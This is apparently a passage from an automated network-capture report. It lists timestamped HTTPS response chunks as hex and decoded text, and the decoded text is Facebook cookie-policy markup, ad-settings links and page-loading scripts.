                                                                                                                Data Ascii: Cp>\u003C\/p>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xp-\">Cookies from other companies\u003C\/div>\u003Cdiv class=\"_9o-i\">We use tools from \u003Ca href=\"https:\/\/www.facebook.com\/policies\/cookies\/#other_companies_section\" target=\"_blank\" class
                                                                                                                2022-10-13 11:08:15 UTC4927INData Raw: 61 79 5c 22 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6f 5c 22 3e 49 66 20 79 6f 75 20 64 6f 6e 5c 75 32 30 31 39 74 20 61 6c 6c 6f 77 20 74 68 65 73 65 20 63 6f 6f 6b 69 65 73 3a 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 70 5c 22 3e 5c 75 30 30 33 43 75 6c 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 5f 5c 22 3e 5c 75 30 30 33 43 6c 69 20 63 6c 61 73 73 3d 5c 22 5f 39 78 71 30 5c 22 3e 57 65 20 77 6f 6e 5c 75 32 30 31 39 74 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 66 72 6f 6d 20 6f 74 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 20 74 6f 20 68 65 6c 70 20 70 65 72 73 6f 6e 61 6c 69 7a 65 20 61 64 73 20 66 6f 72 20 79 6f 75 20 6f 66 66 20 6f 66 20 46 61 63 65 62 6f 6f 6b 20 50 72 6f 64 75 63 74 73 2c
                                                                                                                Data Ascii: ay\">\u003Cp class=\"_9o-o\">If you don\u2019t allow these cookies:\u003C\/p>\u003Cp class=\"_9o-p\">\u003Cul class=\"_9xp_\">\u003Cli class=\"_9xq0\">We won\u2019t use cookies from other companies to help personalize ads for you off of Facebook Products,
                                                                                                                2022-10-13 11:08:15 UTC4929INData Raw: 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 73 65 74 74 69 6e 67 73 5c 2f 61 64 73 5c 2f 5c 22 3e 61 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 54 68 65 20 46 61 63 65 62 6f 6f 6b 20 41 75 64 69 65 6e 63 65 20 4e 65 74 77 6f 72 6b 20 69 73 20 61 20 77 61 79 20 66 6f 72 20 61 64 76 65 72 74 69 73 65 72 73 20 74 6f 20 73 68 6f 77 20 79 6f 75 20 61 64 73 20 69 6e 20 61 70 70 73 20 61 6e 64 20 77 65 62 73 69 74 65 73 20 6f 66 66 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 68 65 6c 70 5c 2f 31 39 35 32 32 37 39
                                                                                                                Data Ascii: ps:\/\/www.facebook.com\/settings\/ads\/\">ad settings\u003C\/a>.\u003C\/p>\u003Cp class=\"_9o-m\">The Facebook Audience Network is a way for advertisers to show you ads in apps and websites off the \u003Ca href=\"https:\/\/www.facebook.com\/help\/1952279
                                                                                                                2022-10-13 11:08:15 UTC4930INData Raw: 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 62 5f 33 61 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 4d 6f 72
                                                                                                                Data Ascii: u003C\/p>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_b_3a\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">Mor
                                                                                                                2022-10-13 11:08:15 UTC4931INData Raw: 33 34 64 39 0d 0a 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 74 68 65 20 55 53 2c 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 79 6f 75 72 61 64 63 68 6f 69 63 65 73 2e 63 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 30 35 6c 46 43 70 63 78 36 47 35 65 64 74 34 46 49 70 4a 42 6f 76 6b 65 61 59 5a 65 67 74 48 74 4b 59 31 68 66 33 73 49 51 7a 65 78 78 75 52 5f 39 37 4f 4f 53 62 61 34 2d 59 4d 39 59 46 30 48 5f 51 69 47 47 5a 45
                                                                                                                Data Ascii: 34d9"asynclazy\">Digital Advertising Alliance\u003C\/a> in the US, the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fyouradchoices.ca\u00252F&amp;h=AT05lFCpcx6G5edt4FIpJBovkeaYZegtHtKY1hf3sIQzexxuR_97OOSba4-YM9YF0H_QiGGZE
                                                                                                                2022-10-13 11:08:15 UTC4932INData Raw: 61 64 73 2e 69 6e 66 6f 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 33 41 52 52 6e 4c 53 68 6f 77 30 38 45 5a 32 64 45 5f 54 62 4a 4f 6f 5f 6e 62 51 46 64 34 49 4b 39 43 47 46 2d 70 34 77 75 53 79 50 66 4c 75 57 61 75 4c 6b 75 73 7a 6c 47 4a 47 66 6a 5a 66 58 37 7a 34 30 55 57 57 38 72 70 64 4f 65 37 57 71 62 52 62 51 6c 54 59 6c 35 38 47 4f 78 6f 6a 37 78 44 61 41 66 59 35 57 44 58 49 2d 7a 77 4c 75 65 53 76 66 5a 79 4e 5a 46 33 34 56 6e 5f 58 6d 45 30 34 57 30 65 54 35 69 71 4e 39 78 38 69 6d 6a 5a 61 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61
                                                                                                                Data Ascii: ads.info\u00252F&amp;h=AT3ARRnLShow08EZ2dE_TbJOo_nbQFd4IK9CGF-p4wuSyPfLuWauLkuszlGJGfjZfX7z40UWW8rpdOe7WqbRbQlTYl58GOxoj7xDaAfY5WDXI-zwLueSvfZyNZF34Vn_XmE04W0eT5iqN9x8imjZag\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Digita
                                                                                                                2022-10-13 11:08:15 UTC4934INData Raw: 33 67 45 6e 47 54 78 62 37 7a 65 20 73 78 5f 36 38 61 61 34 62 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 6f 72 20 64 65 76 69 63 65 20 6d 61 79 20 6f 66 66 65 72 20 73 65 74 74 69 6e 67 73 20 74 68 61 74 20 61 6c 6c 6f 77 20 79 6f 75 20 74 6f 20 63 68 6f 6f 73 65 20 77 68 65 74 68 65 72 20 62 72 6f 77 73 65 72 20 63 6f 6f 6b 69 65 73 20 61 72 65 20 73 65 74 20 61 6e 64 20 74 6f 20 64 65 6c 65 74 65 20 74 68
                                                                                                                Data Ascii: 3gEnGTxb7ze sx_68aa4b\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">Your browser or device may offer settings that allow you to choose whether browser cookies are set and to delete th
                                                                                                                2022-10-13 11:08:15 UTC4935INData Raw: 6f 66 51 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 5c 75 30 30 32 35 32 46 65 6e 2d 55 53 5c 75 30 30 32 35 32 46 6b 62 5c 75 30 30 32 35 32 46 65
                                                                                                                Data Ascii: ofQ\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Internet Explorer\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.mozilla.org\u00252Fen-US\u00252Fkb\u00252Fe
                                                                                                                2022-10-13 11:08:15 UTC4937INData Raw: 35 32 46 6e 65 77 73 5c 75 30 30 32 35 32 46 32 30 31 35 5c 75 30 30 32 35 32 46 30 38 5c 75 30 30 32 35 32 46 68 6f 77 2d 74 6f 2d 6d 61 6e 61 67 65 2d 63 6f 6f 6b 69 65 73 2d 69 6e 2d 6f 70 65 72 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 31 48 37 7a 45 52 6a 34 63 45 67 4d 63 78 6f 69 54 35 36 4a 6c 6d 36 6d 2d 6f 55 59 76 44 75 34 52 47 51 67 38 73 4b 51 33 73 2d 32 63 79 66 36 30 77 47 39 72 47 4a 68 36 35 4d 78 56 42 38 55 61 74 72 2d 45 57 78 34 58 7a 49 70 72 4f 36 5a 4e 71 6d 52 6f 57 75 43 43 76 6d 4a 52 4f 35 71 4c 77 59 67 53 62 33 6a 64 59 50 71 5f 66 72 70 52 66 34 55 7a 78 43 76 31 4b 73 6b 64 6a 47 34 73 38 74 61 63 4f 52 47 55 69 64 6a 72 7a 55 46 50 79 42 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65
                                                                                                                Data Ascii: 52Fnews\u00252F2015\u00252F08\u00252Fhow-to-manage-cookies-in-opera\u00252F&amp;h=AT1H7zERj4cEgMcxoiT56Jlm6m-oUYvDu4RGQg8sKQ3s-2cyf60wG9rGJh65MxVB8Uatr-EWx4XzIprO6ZNqmRoWuCCvmJRO5qLwYgSb3jdYPq_frpRf4UzxCv1KskdjG4s8tacORGUidjrzUFPyBg\" target=\"_blank\" re
                                                                                                                2022-10-13 11:08:15 UTC4938INData Raw: 66 31 61 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 37 5f 51 6c 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 46 72 61 6e 5c 75 30 30 65 37 61 69 73 20 28 46 72 61 6e 63 65 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 38 5f 39 75 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 49 74 61 6c 69 61 6e 6f 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 70 4a 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4d 61 67 79 61 72 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 53 72 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4e 65 64 65 72 6c 61 6e 64 73 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39
                                                                                                                Data Ascii: f1a)"},1],["__markup_3310c079_0_7_Ql",{"__html":"Fran\u00e7ais (France)"},1],["__markup_3310c079_0_8_9u",{"__html":"Italiano"},1],["__markup_3310c079_0_9_pJ",{"__html":"Magyar"},1],["__markup_3310c079_0_a_Sr",{"__html":"Nederlands"},1],["__markup_3310c079
                                                                                                                2022-10-13 11:08:15 UTC4940INData Raw: 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 74 5f 70 47 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 39 39 39 39 5c 75 36 65 32 66 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 75 5f 36 44 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 36 35 65 35 5c 75 36 37 32 63 5c 75 38 61 39 65 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 76 5f 58 53 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 64 35 35 63 5c 75 61 64 36 64 5c 75 63 35 62 34 22 7d 2c 31 5d 5d 2c 22 65 6c 65 6d 65 6e 74 73 22 3a 5b 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 31 5f 6f 61 22 2c 22 75 5f 30 5f 30 5f 41 6c 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38
                                                                                                                Data Ascii: kup_3310c079_0_t_pG",{"__html":"\u4e2d\u6587(\u9999\u6e2f)"},1],["__markup_3310c079_0_u_6D",{"__html":"\u65e5\u672c\u8a9e"},1],["__markup_3310c079_0_v_XS",{"__html":"\ud55c\uad6d\uc5b4"},1]],"elements":[["__elem_a588f507_0_1_oa","u_0_0_Al",1],["__elem_a58
                                                                                                                2022-10-13 11:08:15 UTC4941INData Raw: 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 52 65 73 65 74 53 63 72 6f 6c 6c 4f 6e 55 6e 6c 6f 61 64 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 30 68 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 30 68 22 7d 5d 5d 2c 5b 22 41 63 63 65 73 73 69 62 69 6c 69 74 79 57 65 62 56 69 72 74 75 61 6c 43 75 72 73 6f 72 43 6c 69 63 6b 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 30 68 22 5d 2c 5b 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 30 68 22 7d 5d 5d 5d 2c 5b 22 4b 65 79 62 6f 61 72 64 41 63 74 69 76 69 74 79 4c 6f 67 67 65 72 22 2c 22 69
                                                                                                                Data Ascii: on","init",[],[]],["ResetScrollOnUnload","init",["__elem_a588f507_0_0_0h"],[{"__m":"__elem_a588f507_0_0_0h"}]],["AccessibilityWebVirtualCursorClickLogger","init",["__elem_a588f507_0_0_0h"],[[{"__m":"__elem_a588f507_0_0_0h"}]]],["KeyboardActivityLogger","i
                                                                                                                2022-10-13 11:08:15 UTC4943INData Raw: 74 5f 69 6e 69 74 5f 69 6d 70 72 65 73 73 69 6f 6e 22 5d 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 43 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 7b 22 63 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 49 44 22 3a 22 65 6d 61 69 6c 22 2c 22 73 65 72 76 65 72 50 72 65 66 69 6c 6c 22 3a 22 22 7d 5d 5d 2c 5b 22 46 6f 63 75 73 4c 69 73 74 65 6e 65 72 22 5d 2c 5b 22 46 6c 69 70 44 69 72 65 63 74 69 6f 6e 4f 6e 4b 65 79 70 72 65 73 73 22 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 50 61 73 73 77 6f 72 64 46 69 65 6c 64 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 7b 22 70 61 73 73 77 6f 72 64 46 69 65 6c 64 49 44 22 3a
                                                                                                                Data Ascii: t_init_impression"]],["BrowserPrefillLogging","initContactpointFieldLogging",[],[{"contactpointFieldID":"email","serverPrefill":""}]],["FocusListener"],["FlipDirectionOnKeypress"],["BrowserPrefillLogging","initPasswordFieldLogging",[],[{"passwordFieldID":
                                                                                                                2022-10-13 11:08:15 UTC4944INData Raw: 7d 2c 74 72 75 65 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 0d 0a 31 32 34 62 0d 0a 32 5f 5a 66 22 7d 2c 74 72 75 65 5d 5d 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 52 75 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 52 75 6e 29 7b 52 75 6e 2e 6f 6e 41 66 74 65 72 4c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 63 6c 65 61 6e 75 70 28 54 69 6d 65 53 6c 69 63 65 29 7d 29 7d 29 3b 7d 29 3b 0a 0a 6f 6e 6c 6f 61 64 52 65 67 69 73 74 65 72 5f 44 45 50 52 45 43 41 54 45 44 28 66 75 6e 63 74 69 6f 6e 20 28 29 7b 62 65 67 69 6e 5f 70 6f 6c 6c 69 6e 67 5f 6c 6f 67 69 6e 5f 63 6f 6f 6b 69 65 73 28 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 61 64 73 5c 2f 6d 61 6e 61 67
                                                                                                                Data Ascii: },true],[{"__m":"__elem_a588f507_0_124b2_Zf"},true]]});requireLazy(["Run"],function(Run){Run.onAfterLoad(function(){s.cleanup(TimeSlice)})});});onloadRegister_DEPRECATED(function (){begin_polling_login_cookies("https:\/\/www.facebook.com\/ads\/manag
                                                                                                                2022-10-13 11:08:15 UTC4946INData Raw: 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6a 2f 72 2f 77 38 69 4f 47 51 5f 48 77 33 63 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6e 6f 6e 63 65 3d 22 4d 35 70 41 6c 78 55 30 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 69 37 4d 35 34 2f 79 4b 2f 6c 2f 65 6e 5f 55 53 2f 37 58 46 72 73 4d 5a 61 6d 76 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69
                                                                                                                Data Ascii: s://static.xx.fbcdn.net/rsrc.php/v3/yj/r/w8iOGQ_Hw3c.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous" nonce="M5pAlxU0" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yK/l/en_US/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz" as="scri
                                                                                                                2022-10-13 11:08:15 UTC4947INData Raw: 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 4c 2f 6c 2f 30 2c 63 72 6f 73 73 2f 35 5f 37 36 65 70 64 6f 6e 4e 75 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64
                                                                                                                Data Ascii: c_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yL/l/0,cross/5_76epdonNu.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href="https://static.xx.fbcd
                                                                                                                2022-10-13 11:08:15 UTC4949INData Raw: 50 46 66 22 2c 22 79 53 65 57 37 48 67 22 2c 22 38 6d 7a 67 59 75 35 22 2c 22 49 61 52 2f 36 75 50 22 2c 22 4c 70 78 52 35 71 55 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 59 74 55 33 43 35 75 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 65 39 41 4e 7a 77 2f 22 2c 22 30 37 4a 53 69 50 30 22 2c 22 64 78 2f 41 67 70 4f 22 5d 7d 29 3b 7d 29 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 73 65 74 50 61 67 65 49 44 28 22 37 31 35 33 39 35 32 31 39 39 35 33 33 31 30 30 35 30 30 22 29 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                                                Data Ascii: PFf","ySeW7Hg","8mzgYu5","IaR/6uP","LpxR5qU","R5w1rCJ","YtU3C5u","CGkH4FY","e9ANzw/","07JSiP0","dx/AgpO"]});}));</script><script>requireLazy(["__bigPipe"],function(bigPipe){bigPipe.setPageID("7153952199533100500")});</script>
                                                                                                                2022-10-13 11:08:15 UTC4949INData Raw: 31 31 38 39 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4d 35 70 41 6c 78 55 30 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4d 35 70 41 6c 78 55 30 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41
                                                                                                                Data Ascii: 1189<script nonce="M5pAlxU0">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script><script nonce="M5pAlxU0">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletA
                                                                                                                2022-10-13 11:08:15 UTC4950INData Raw: 77 55 48 36 42 41 48 50 6e 6e 67 41 32 41 35 34 65 78 52 2d 54 54 4d 53 41 61 74 38 4a 49 71 55 4f 61 51 79 59 57 64 42 79 6b 6b 41 6a 69 56 62 7a 5a 44 55 64 73 59 61 32 44 61 48 79 52 74 62 68 78 35 79 46 36 2d 72 4c 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 32 7a 70 6a 36 7a 31 31 37 34 5f 51 30 48 55 77 55 48 36 42 41 48 50 6e 6e 67 41 32 41 35 34 65 78 52 2d 54 54 4d 53 41 61 74 38 4a 49 71 55 4f 61 51 79 59 57 64 42 79 6b 6b 41 6a 69 56 62 7a 5a 44 55 64 73 59 61 32 44 61 48 79 52 74 62 68 78 35 79 46 36 2d 72 4c 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c 5b 5d 2c 7b
                                                                                                                Data Ascii: wUH6BAHPnngA2A54exR-TTMSAat8JIqUOaQyYWdBykkAjiVbzZDUdsYa2DaHyRtbhx5yF6-rLc"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa2zpj6z1174_Q0HUwUH6BAHPnngA2A54exR-TTMSAat8JIqUOaQyYWdBykkAjiVbzZDUdsYa2DaHyRtbhx5yF6-rLc"]},-1],["cr:1083117",[],{
                                                                                                                2022-10-13 11:08:15 UTC4952INData Raw: 53 2d 51 78 79 47 45 30 42 6f 66 45 4e 54 68 71 50 54 4c 32 58 72 6a 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67 6b 73 3a 7b 62 6f 6f 73 74 65 64 5f 70 61 67 65 6c 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 72 6d 